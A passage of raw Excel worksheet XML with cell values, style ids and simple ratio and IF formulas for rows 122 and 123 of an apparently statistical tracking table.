        <f t="shared" si="167"/>
        <v>0</v>
      </c>
      <c r="BM122" s="103">
        <f t="shared" si="168"/>
        <v>0</v>
      </c>
      <c r="BN122" s="103">
        <f t="shared" si="169"/>
        <v>0</v>
      </c>
      <c r="BO122" s="103">
        <f t="shared" si="170"/>
        <v>0</v>
      </c>
      <c r="BP122" s="103">
        <f t="shared" si="171"/>
        <v>0</v>
      </c>
      <c r="BQ122" s="103">
        <f t="shared" si="172"/>
        <v>0</v>
      </c>
      <c r="BR122" s="103">
        <f t="shared" si="173"/>
        <v>0</v>
      </c>
      <c r="BS122" s="103">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="BT122" s="103">
        <f t="shared" si="175"/>
        <v>0</v>
      </c>
      <c r="BU122" s="103">
        <f>(BE122+BF122)/(N122+O122)</f>
        <v>0</v>
      </c>
      <c r="BV122" s="103">
        <f>IF(OR(BN122=0,BN122="-"),0,1)</f>
        <v>0</v>
      </c>
      <c r="BW122" s="104" t="s">
        <v>12</v>
      </c>
      <c r="BX122" s="104">
        <v>0.0</v>
      </c>
      <c r="BY122" s="104">
        <v>0.0</v>
      </c>
      <c r="BZ122" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA122" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CB122" s="104">
        <v>0.0</v>
      </c>
      <c r="CC122" s="104">
        <v>0.0</v>
      </c>
      <c r="CD122" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CE122" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF122" s="104" t="str">
        <f t="shared" si="203"/>
        <v>-</v>
      </c>
      <c r="CG122" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH122" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CI122" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ122" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK122" s="104">
        <v>0.0</v>
      </c>
      <c r="CL122" s="104">
        <v>0.0</v>
      </c>
      <c r="CM122" s="105">
        <v>35.0</v>
      </c>
      <c r="CN122" s="105">
        <v>0.0</v>
      </c>
      <c r="CO122" s="105">
        <v>0.0</v>
      </c>
      <c r="CP122" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ122" s="105">
        <v>0.0</v>
      </c>
      <c r="CR122" s="105">
        <v>0.0</v>
      </c>
      <c r="CS122" s="105">
        <v>0.0</v>
      </c>
      <c r="CT122" s="105">
        <v>0.0</v>
      </c>
      <c r="CU122" s="105">
        <v>0.0</v>
      </c>
      <c r="CV122" s="105">
        <v>0.0</v>
      </c>
      <c r="CW122" s="105">
        <v>0.0</v>
      </c>
      <c r="CX122" s="105">
        <v>0.0</v>
      </c>
      <c r="CY122" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ122" s="105">
        <v>0.0</v>
      </c>
      <c r="DA122" s="105">
        <v>0.0</v>
      </c>
      <c r="DB122" s="106">
        <f t="shared" si="176"/>
        <v>0</v>
      </c>
      <c r="DC122" s="106">
        <f t="shared" si="177"/>
        <v>0</v>
      </c>
      <c r="DD122" s="106">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="DE122" s="106">
        <f t="shared" si="179"/>
        <v>0</v>
      </c>
      <c r="DF122" s="106">
        <f t="shared" si="180"/>
        <v>0</v>
      </c>
      <c r="DG122" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH122" s="106">
        <f t="shared" si="181"/>
        <v>0</v>
      </c>
      <c r="DI122" s="106">
        <f t="shared" si="182"/>
        <v>0</v>
      </c>
      <c r="DJ122" s="106">
        <f t="shared" si="183"/>
        <v>0</v>
      </c>
      <c r="DK122" s="107">
        <f>(CS122+CT122)/(N122+O122)</f>
        <v>0</v>
      </c>
      <c r="DL122" s="106">
        <f>IF(AND(OR(DD122=0,DD122="-"),DK122=0),0,1)</f>
        <v>0</v>
      </c>
      <c r="DM122" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DN122" s="108">
        <v>0.0</v>
      </c>
      <c r="DO122" s="108">
        <v>0.0</v>
      </c>
      <c r="DP122" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ122" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DR122" s="108">
        <v>0.0</v>
      </c>
      <c r="DS122" s="108">
        <v>0.0</v>
      </c>
      <c r="DT122" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DU122" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV122" s="108" t="str">
        <f t="shared" si="166"/>
        <v>-</v>
      </c>
      <c r="DW122" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX122" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DY122" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ122" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA122" s="108">
        <v>0.0</v>
      </c>
      <c r="EB122" s="108">
        <v>0.0</v>
      </c>
      <c r="EC122" s="109">
        <v>129.0</v>
      </c>
      <c r="ED122" s="109">
        <v>0.0</v>
      </c>
      <c r="EE122" s="109">
        <v>0.0</v>
      </c>
      <c r="EF122" s="109">
        <v>0.0</v>
      </c>
      <c r="EG122" s="109">
        <v>0.0</v>
      </c>
      <c r="EH122" s="109">
        <v>0.0</v>
      </c>
      <c r="EI122" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ122" s="109">
        <v>0.0</v>
      </c>
      <c r="EK122" s="109">
        <v>0.0</v>
      </c>
      <c r="EL122" s="109">
        <v>0.0</v>
      </c>
      <c r="EM122" s="109">
        <v>0.0</v>
      </c>
      <c r="EN122" s="109">
        <v>0.0</v>
      </c>
      <c r="EO122" s="109">
        <v>0.0</v>
      </c>
      <c r="EP122" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ122" s="109">
        <v>0.0</v>
      </c>
      <c r="ER122" s="110">
        <f t="shared" si="184"/>
        <v>0</v>
      </c>
      <c r="ES122" s="110">
        <f t="shared" si="185"/>
        <v>0</v>
      </c>
      <c r="ET122" s="110">
        <f t="shared" si="186"/>
        <v>0</v>
      </c>
      <c r="EU122" s="110">
        <f t="shared" si="187"/>
        <v>0</v>
      </c>
      <c r="EV122" s="110">
        <f t="shared" si="188"/>
        <v>0</v>
      </c>
      <c r="EW122" s="110">
        <f t="shared" si="189"/>
        <v>0</v>
      </c>
      <c r="EX122" s="110">
        <f t="shared" si="190"/>
        <v>0</v>
      </c>
      <c r="EY122" s="110">
        <f t="shared" si="191"/>
        <v>0</v>
      </c>
      <c r="EZ122" s="110">
        <f t="shared" si="192"/>
        <v>0</v>
      </c>
      <c r="FA122" s="110">
        <f>(EI122+EJ122)/(N122+O122)</f>
        <v>0</v>
      </c>
      <c r="FB122" s="110">
        <f>IF(AND(OR(ET122=0,ET122="-"),FA122=0),0,1)</f>
        <v>0</v>
      </c>
      <c r="FC122" s="111" t="s">
        <v>423</v>
      </c>
      <c r="FD122" s="111">
        <v>2.0</v>
      </c>
      <c r="FE122" s="111">
        <v>9.0</v>
      </c>
      <c r="FF122" s="101" t="s">
        <v>229</v>
      </c>
      <c r="FG122" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FH122" s="111">
        <v>0.0</v>
      </c>
      <c r="FI122" s="111">
        <v>0.0</v>
      </c>
      <c r="FJ122" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FK122" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FL122" s="111" t="str">
        <f t="shared" si="155"/>
        <v>2002752, 2002749</v>
      </c>
      <c r="FM122" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN122" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FO122" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP122" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ122" s="111">
        <v>0.0</v>
      </c>
      <c r="FR122" s="111">
        <v>0.0</v>
      </c>
      <c r="FS122" s="112">
        <v>129.0</v>
      </c>
      <c r="FT122" s="112">
        <v>3.0</v>
      </c>
      <c r="FU122" s="112">
        <v>3.0</v>
      </c>
      <c r="FV122" s="112">
        <v>0.0</v>
      </c>
      <c r="FW122" s="112">
        <v>9.0</v>
      </c>
      <c r="FX122" s="112">
        <v>9.0</v>
      </c>
      <c r="FY122" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ122" s="112">
        <v>0.0</v>
      </c>
      <c r="GA122" s="112">
        <v>0.0</v>
      </c>
      <c r="GB122" s="112">
        <v>0.0</v>
      </c>
      <c r="GC122" s="112">
        <v>0.0</v>
      </c>
      <c r="GD122" s="112">
        <v>0.0</v>
      </c>
      <c r="GE122" s="112">
        <v>0.0</v>
      </c>
      <c r="GF122" s="112">
        <v>0.0</v>
      </c>
      <c r="GG122" s="112">
        <v>0.0</v>
      </c>
      <c r="GH122" s="113">
        <f t="shared" si="193"/>
        <v>3</v>
      </c>
      <c r="GI122" s="113">
        <f t="shared" si="194"/>
        <v>0</v>
      </c>
      <c r="GJ122" s="113">
        <f t="shared" si="195"/>
        <v>0</v>
      </c>
      <c r="GK122" s="113">
        <f t="shared" si="196"/>
        <v>3</v>
      </c>
      <c r="GL122" s="113">
        <f t="shared" si="197"/>
        <v>0</v>
      </c>
      <c r="GM122" s="113">
        <f t="shared" si="198"/>
        <v>0</v>
      </c>
      <c r="GN122" s="113">
        <f t="shared" si="199"/>
        <v>9</v>
      </c>
      <c r="GO122" s="113">
        <f t="shared" si="200"/>
        <v>0</v>
      </c>
      <c r="GP122" s="113">
        <f t="shared" si="201"/>
        <v>0</v>
      </c>
      <c r="GQ122" s="114">
        <f>(FY122+FZ122)/(N122+O122)</f>
        <v>0</v>
      </c>
      <c r="GR122" s="113">
        <f>IF(AND(OR(GJ122=0,GJ122="-"),GQ122=0),0,1)</f>
        <v>0</v>
      </c>
      <c r="GS122" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT122" s="94"/>
      <c r="GU122" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV122" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW122" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX122" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY122" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ122" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA122" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB122" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC122" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD122" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE122" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF122" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG122" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH122" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI122" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ122" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK122" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL122" s="93">
        <v>129.0</v>
      </c>
      <c r="HM122" s="93">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="HN122" s="93">
        <v>0.0</v>
      </c>
      <c r="HO122" s="93">
        <v>0.0</v>
      </c>
      <c r="HP122" s="93">
        <v>0.0</v>
      </c>
      <c r="HQ122" s="118">
        <f t="shared" si="53"/>
        <v>0</v>
      </c>
      <c r="HR122" s="118">
        <f t="shared" si="54"/>
        <v>0</v>
      </c>
      <c r="HS122" s="118">
        <f t="shared" si="55"/>
        <v>0</v>
      </c>
      <c r="HT122" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU122" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV122" s="119" t="s">
        <v>2073</v>
      </c>
      <c r="HW122" s="119">
        <v>2.0</v>
      </c>
      <c r="HX122" s="119">
        <v>248.0</v>
      </c>
      <c r="HY122" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ122" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA122" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB122" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC122" s="120">
        <v>93031.0</v>
      </c>
      <c r="ID122" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IE122" s="120">
        <v>9999.0</v>
      </c>
      <c r="IF122" s="120" t="s">
        <v>2073</v>
      </c>
      <c r="IG122" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH122" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II122" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ122" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK122" s="99">
        <v>129.0</v>
      </c>
      <c r="IL122" s="99">
        <v>0.0</v>
      </c>
      <c r="IM122" s="121">
        <f t="shared" si="159"/>
        <v>0</v>
      </c>
      <c r="IN122" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO122" s="98">
        <v>0.0</v>
      </c>
      <c r="IP122" s="123">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="IQ122" s="118">
        <f t="shared" si="59"/>
        <v>0</v>
      </c>
      <c r="IR122" s="118">
        <f t="shared" si="60"/>
        <v>0</v>
      </c>
      <c r="IS122" s="124" t="s">
        <v>225</v>
      </c>
      <c r="IT122" s="127"/>
      <c r="IU122" s="127"/>
      <c r="IV122" s="127"/>
      <c r="IW122" s="127"/>
      <c r="IX122" s="127"/>
      <c r="IY122" s="127"/>
      <c r="IZ122" s="127"/>
      <c r="JA122" s="127"/>
      <c r="JB122" s="127"/>
      <c r="JC122" s="127"/>
      <c r="JD122" s="127"/>
      <c r="JE122" s="127"/>
      <c r="JF122" s="127"/>
      <c r="JG122" s="127"/>
      <c r="JH122" s="127"/>
      <c r="JI122" s="127"/>
      <c r="JJ122" s="127"/>
      <c r="JK122" s="127"/>
      <c r="JL122" s="127"/>
      <c r="JM122" s="127"/>
      <c r="JN122" s="127"/>
      <c r="JO122" s="127"/>
      <c r="JP122" s="127"/>
      <c r="JQ122" s="127"/>
      <c r="JR122" s="127"/>
      <c r="JS122" s="127"/>
      <c r="JT122" s="127"/>
      <c r="JU122" s="127"/>
      <c r="JV122" s="127"/>
      <c r="JW122" s="127"/>
      <c r="JX122" s="127"/>
      <c r="JY122" s="127"/>
      <c r="JZ122" s="127"/>
      <c r="KA122" s="127"/>
      <c r="KB122" s="127"/>
      <c r="KC122" s="127"/>
      <c r="KD122" s="127"/>
      <c r="KE122" s="127"/>
      <c r="KF122" s="127"/>
      <c r="KG122" s="127"/>
      <c r="KH122" s="127"/>
      <c r="KI122" s="127"/>
      <c r="KJ122" s="127"/>
      <c r="KK122" s="127"/>
      <c r="KL122" s="127"/>
      <c r="KM122" s="127"/>
      <c r="KN122" s="127"/>
      <c r="KO122" s="127"/>
      <c r="KP122" s="127"/>
      <c r="KQ122" s="127"/>
      <c r="KR122" s="127"/>
      <c r="KS122" s="127"/>
      <c r="KT122" s="127"/>
      <c r="KU122" s="127"/>
      <c r="KV122" s="127"/>
      <c r="KW122" s="127"/>
      <c r="KX122" s="127"/>
      <c r="KY122" s="127"/>
      <c r="KZ122" s="127"/>
      <c r="LA122" s="127"/>
      <c r="LB122" s="127"/>
      <c r="LC122" s="127"/>
      <c r="LD122" s="127"/>
      <c r="LE122" s="127"/>
      <c r="LF122" s="127"/>
      <c r="LG122" s="127"/>
      <c r="LH122" s="127"/>
      <c r="LI122" s="127"/>
      <c r="LJ122" s="127"/>
      <c r="LK122" s="127"/>
      <c r="LL122" s="127"/>
      <c r="LM122" s="127"/>
      <c r="LN122" s="127"/>
      <c r="LO122" s="127"/>
      <c r="LP122" s="127"/>
      <c r="LQ122" s="127"/>
      <c r="LR122" s="127"/>
      <c r="LS122" s="127"/>
      <c r="LT122" s="127"/>
      <c r="LU122" s="127"/>
      <c r="LV122" s="127"/>
      <c r="LW122" s="127"/>
      <c r="LX122" s="127"/>
      <c r="LY122" s="127"/>
      <c r="LZ122" s="127"/>
      <c r="MA122" s="127"/>
      <c r="MB122" s="127"/>
      <c r="MC122" s="127"/>
      <c r="MD122" s="127"/>
      <c r="ME122" s="127"/>
      <c r="MF122" s="127"/>
      <c r="MG122" s="127"/>
      <c r="MH122" s="127"/>
      <c r="MI122" s="127"/>
      <c r="MJ122" s="127"/>
      <c r="MK122" s="127"/>
      <c r="ML122" s="127"/>
      <c r="MM122" s="127"/>
      <c r="MN122" s="127"/>
      <c r="MO122" s="127"/>
      <c r="MP122" s="127"/>
      <c r="MQ122" s="127"/>
      <c r="MR122" s="127"/>
      <c r="MS122" s="127"/>
      <c r="MT122" s="127"/>
      <c r="MU122" s="127"/>
      <c r="MV122" s="127"/>
      <c r="MW122" s="127"/>
      <c r="MX122" s="127"/>
      <c r="MY122" s="127"/>
      <c r="MZ122" s="127"/>
      <c r="NA122" s="127"/>
      <c r="NB122" s="127"/>
      <c r="NC122" s="127"/>
      <c r="ND122" s="127"/>
      <c r="NE122" s="127"/>
      <c r="NF122" s="127"/>
      <c r="NG122" s="127"/>
      <c r="NH122" s="127"/>
      <c r="NI122" s="127"/>
      <c r="NJ122" s="127"/>
      <c r="NK122" s="127"/>
      <c r="NL122" s="127"/>
      <c r="NM122" s="127"/>
      <c r="NN122" s="127"/>
      <c r="NO122" s="127"/>
      <c r="NP122" s="127"/>
      <c r="NQ122" s="127"/>
      <c r="NR122" s="127"/>
      <c r="NS122" s="127"/>
      <c r="NT122" s="127"/>
      <c r="NU122" s="127"/>
      <c r="NV122" s="127"/>
      <c r="NW122" s="127"/>
      <c r="NX122" s="127"/>
      <c r="NY122" s="127"/>
    </row>
    <row r="123" ht="153.75" customHeight="1">
      <c r="B123" s="89" t="s">
        <v>2013</v>
      </c>
      <c r="C123" s="91" t="s">
        <v>12</v>
      </c>
      <c r="D123" s="91" t="s">
        <v>2014</v>
      </c>
      <c r="E123" s="90" t="s">
        <v>2074</v>
      </c>
      <c r="F123" s="90" t="s">
        <v>2075</v>
      </c>
      <c r="G123" s="91" t="s">
        <v>2063</v>
      </c>
      <c r="H123" s="90" t="s">
        <v>2076</v>
      </c>
      <c r="I123" s="169" t="s">
        <v>2077</v>
      </c>
      <c r="J123" s="92" t="s">
        <v>865</v>
      </c>
      <c r="K123" s="92" t="s">
        <v>2078</v>
      </c>
      <c r="L123" s="93" t="s">
        <v>375</v>
      </c>
      <c r="M123" s="93">
        <v>6951.0</v>
      </c>
      <c r="N123" s="93">
        <v>6951.0</v>
      </c>
      <c r="O123" s="93">
        <v>0.0</v>
      </c>
      <c r="P123" s="93">
        <v>701939.0</v>
      </c>
      <c r="Q123" s="93">
        <v>701939.0</v>
      </c>
      <c r="R123" s="93">
        <v>701939.0</v>
      </c>
      <c r="S123" s="93">
        <v>0.0</v>
      </c>
      <c r="T123" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U123" s="95" t="s">
        <v>224</v>
      </c>
      <c r="V123" s="126" t="s">
        <v>2079</v>
      </c>
      <c r="W123" s="96" t="s">
        <v>2080</v>
      </c>
      <c r="X123" s="97" t="s">
        <v>2081</v>
      </c>
      <c r="Y123" s="126" t="s">
        <v>2082</v>
      </c>
      <c r="Z123" s="96" t="s">
        <v>2083</v>
      </c>
      <c r="AA123" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB123" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC123" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD123" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE123" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF123" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG123" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH123" s="99" t="s">
        <v>2084</v>
      </c>
      <c r="AI123" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ123" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AK123" s="100" t="s">
        <v>2085</v>
      </c>
      <c r="AL123" s="100">
        <v>44.0</v>
      </c>
      <c r="AM123" s="100">
        <v>9998.0</v>
      </c>
      <c r="AN123" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO123" s="100" t="s">
        <v>2085</v>
      </c>
      <c r="AP123" s="100">
        <v>44.0</v>
      </c>
      <c r="AQ123" s="100">
        <v>9998.0</v>
      </c>
      <c r="AR123" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS123" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT123" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AU123" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV123" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW123" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX123" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY123" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ123" s="100">
        <v>0.0</v>
      </c>
      <c r="BA123" s="102">
        <v>6951.0</v>
      </c>
      <c r="BB123" s="102">
        <v>0.0</v>
      </c>
      <c r="BC123" s="102">
        <v>1.0</v>
      </c>
      <c r="BD123" s="102">
        <v>9998.0</v>
      </c>
      <c r="BE123" s="102" t="s">
        <v>12</v>
      </c>
      <c r="BF123" s="102">
        <v>0.0</v>
      </c>
      <c r="BG123" s="102" t="s">
        <v>12</v>
      </c>
      <c r="BH123" s="102" t="s">
        <v>12</v>
      </c>
      <c r="BI123" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ123" s="102">
        <v>1.0</v>
      </c>
      <c r="BK123" s="102">
        <v>9998.0</v>
      </c>
      <c r="BL123" s="103">
        <f t="shared" si="167"/>
        <v>0</v>
      </c>
      <c r="BM123" s="103">
        <f t="shared" si="168"/>
        <v>0</v>
      </c>
      <c r="BN123" s="103" t="str">
        <f t="shared" si="169"/>
        <v>-</v>
      </c>
      <c r="BO123" s="103">
        <f t="shared" si="170"/>
        <v>0.000001424625217</v>
      </c>
      <c r="BP123" s="103">
        <f t="shared" si="171"/>
        <v>0.000001424625217</v>
      </c>
      <c r="BQ123" s="103" t="str">
        <f t="shared" si="172"/>
        <v>-</v>
      </c>
      <c r="BR123" s="103">
        <f t="shared" si="173"/>
        <v>0.01424340292</v>
      </c>
      <c r="BS123" s="103">
        <f t="shared" si="174"/>
        <v>0.01424340292</v>
      </c>
      <c r="BT123" s="103" t="str">
        <f t="shared" si="175"/>
        <v>-</v>
      </c>
      <c r="BU123" s="102" t="s">
        <v>12</v>
      </c>
      <c r="BV123" s="102" t="s">
        <v>12</v>
      </c>
      <c r="BW123" s="104" t="s">
        <v>2086</v>
      </c>
      <c r="BX123" s="104">
        <v>59.0</v>
      </c>
      <c r="BY123" s="104">
        <v>13175.0</v>
      </c>
      <c r="BZ123" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA123" s="104" t="s">
        <v>2086</v>
      </c>
      <c r="CB123" s="104">
        <v>59.0</v>
      </c>
      <c r="CC123" s="104">
        <v>13175.0</v>
      </c>
      <c r="CD123" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CE123" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF123" s="104" t="str">
        <f t="shared" si="203"/>
        <v>-</v>
      </c>
      <c r="CG123" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH123" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CI123" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ123" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK123" s="104">
        <v>0.0</v>
      </c>
      <c r="CL123" s="104">
        <v>0.0</v>
      </c>
      <c r="CM123" s="105">
        <v>6950.0</v>
      </c>
      <c r="CN123" s="105">
        <v>1253.0</v>
      </c>
      <c r="CO123" s="105">
        <v>3177.0</v>
      </c>
      <c r="CP123" s="105">
        <v>9998.0</v>
      </c>
      <c r="CQ123" s="105">
        <v>3177.0</v>
      </c>
      <c r="CR123" s="105" t="s">
        <v>12</v>
      </c>
      <c r="CS123" s="105" t="s">
        <v>12</v>
      </c>
      <c r="CT123" s="105">
        <v>0.0</v>
      </c>
      <c r="CU123" s="105" t="s">
        <v>12</v>
      </c>
      <c r="CV123" s="105" t="s">
        <v>12</v>
      </c>
      <c r="CW123" s="105">
        <v>1253.0</v>
      </c>
      <c r="CX123" s="105">
        <v>3177.0</v>
      </c>
      <c r="CY123" s="105">
        <v>9998.0</v>
      </c>
      <c r="CZ123" s="105">
        <v>3177.0</v>
      </c>
      <c r="DA123" s="105" t="s">
        <v>12</v>
      </c>
      <c r="DB123" s="106">
        <f t="shared" si="176"/>
        <v>0.1802618328</v>
      </c>
      <c r="DC123" s="106">
        <f t="shared" si="177"/>
        <v>0.1802618328</v>
      </c>
      <c r="DD123" s="106" t="str">
        <f t="shared" si="178"/>
        <v>-</v>
      </c>
      <c r="DE123" s="106">
        <f t="shared" si="179"/>
        <v>0.004526034314</v>
      </c>
      <c r="DF123" s="106">
        <f t="shared" si="180"/>
        <v>0.004526034314</v>
      </c>
      <c r="DG123" s="106" t="str">
        <f t="shared" si="20"/>
        <v>-</v>
      </c>
      <c r="DH123" s="106" t="str">
        <f t="shared" si="181"/>
        <v>-</v>
      </c>
      <c r="DI123" s="106" t="str">
        <f t="shared" si="182"/>
        <v>-</v>
      </c>
      <c r="DJ123" s="106" t="str">
        <f t="shared" si="183"/>
        <v>-</v>
      </c>
      <c r="DK123" s="141" t="s">
        <v>12</v>
      </c>
      <c r="DL123" s="141" t="s">
        <v>12</v>
      </c>
      <c r="DM123" s="108" t="s">
        <v>2087</v>
      </c>
      <c r="DN123" s="108">
        <v>64.0</v>
      </c>
      <c r="DO123" s="108">
        <v>723016.0</v>
      </c>
      <c r="DP123" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ123" s="108" t="s">
        <v>2087</v>
      </c>
      <c r="DR123" s="108">
        <v>64.0</v>
      </c>
      <c r="DS123" s="108">
        <v>723016.0</v>
      </c>
      <c r="DT123" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DU123" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV123" s="108" t="str">
        <f t="shared" si="166"/>
        <v>-</v>
      </c>
      <c r="DW123" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX123" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DY123" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ123" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA123" s="108">
        <v>0.0</v>
      </c>
      <c r="EB123" s="108">
        <v>0.0</v>
      </c>
      <c r="EC123" s="109">
        <v>6951.0</v>
      </c>
      <c r="ED123" s="109">
        <v>1253.0</v>
      </c>
      <c r="EE123" s="109">
        <v>3177.0</v>
      </c>
      <c r="EF123" s="109">
        <v>719839.0</v>
      </c>
      <c r="EG123" s="109">
        <v>3177.0</v>
      </c>
      <c r="EH123" s="109" t="s">
        <v>12</v>
      </c>
      <c r="EI123" s="109" t="s">
        <v>12</v>
      </c>
      <c r="EJ123" s="109">
        <v>0.0</v>
      </c>
      <c r="EK123" s="109" t="s">
        <v>12</v>
      </c>
      <c r="EL123" s="109" t="s">
        <v>12</v>
      </c>
      <c r="EM123" s="109">
        <v>1253.0</v>
      </c>
      <c r="EN123" s="109">
        <v>3177.0</v>
      </c>
      <c r="EO123" s="109">
        <v>719839.0</v>
      </c>
      <c r="EP123" s="109">
        <v>3177.0</v>
      </c>
      <c r="EQ123" s="109" t="s">
        <v>12</v>
      </c>
      <c r="ER123" s="110">
        <f t="shared" si="184"/>
        <v>0.1802618328</v>
      </c>
      <c r="ES123" s="110">
        <f t="shared" si="185"/>
        <v>0.1802618328</v>
      </c>
      <c r="ET123" s="110" t="str">
        <f t="shared" si="186"/>
        <v>-</v>
      </c>
      <c r="EU123" s="110">
        <f t="shared" si="187"/>
        <v>0.004526034314</v>
      </c>
      <c r="EV123" s="110">
        <f t="shared" si="188"/>
        <v>0.004526034314</v>
      </c>
      <c r="EW123" s="110" t="str">
        <f t="shared" si="189"/>
        <v>-</v>
      </c>
      <c r="EX123" s="110" t="str">
        <f t="shared" si="190"/>
        <v>-</v>
      </c>
      <c r="EY123" s="110" t="str">
        <f t="shared" si="191"/>
        <v>-</v>
      </c>
      <c r="EZ123" s="110" t="str">
        <f t="shared" si="192"/>
        <v>-</v>
      </c>
      <c r="FA123" s="109" t="s">
        <v>12</v>
      </c>
      <c r="FB123" s="109" t="s">
        <v>12</v>
      </c>
      <c r="FC123" s="111" t="s">
        <v>2088</v>
      </c>
      <c r="FD123" s="111">
        <v>79.0</v>
      </c>
      <c r="FE123" s="111">
        <v>748399.0</v>
      </c>
      <c r="FF123" s="101" t="s">
        <v>229</v>
      </c>
      <c r="FG123" s="111" t="s">
        <v>2089</v>
      </c>
      <c r="FH123" s="111">
        <v>77.0</v>
      </c>
      <c r="FI123" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FJ123" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FK123" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FL123" s="111" t="str">
        <f t="shared" si="155"/>
        <v>2002752, 2002749</v>
      </c>
      <c r="FM123" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN123" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FO123" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP123" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ123" s="111">
        <v>0.0</v>
      </c>
      <c r="FR123" s="111">
        <v>0.0</v>
      </c>
      <c r="FS123" s="112">
        <v>6950.0</v>
      </c>
      <c r="FT123" s="112">
        <v>6950.0</v>
      </c>
      <c r="FU123" s="112">
        <v>27785.0</v>
      </c>
      <c r="FV123" s="112">
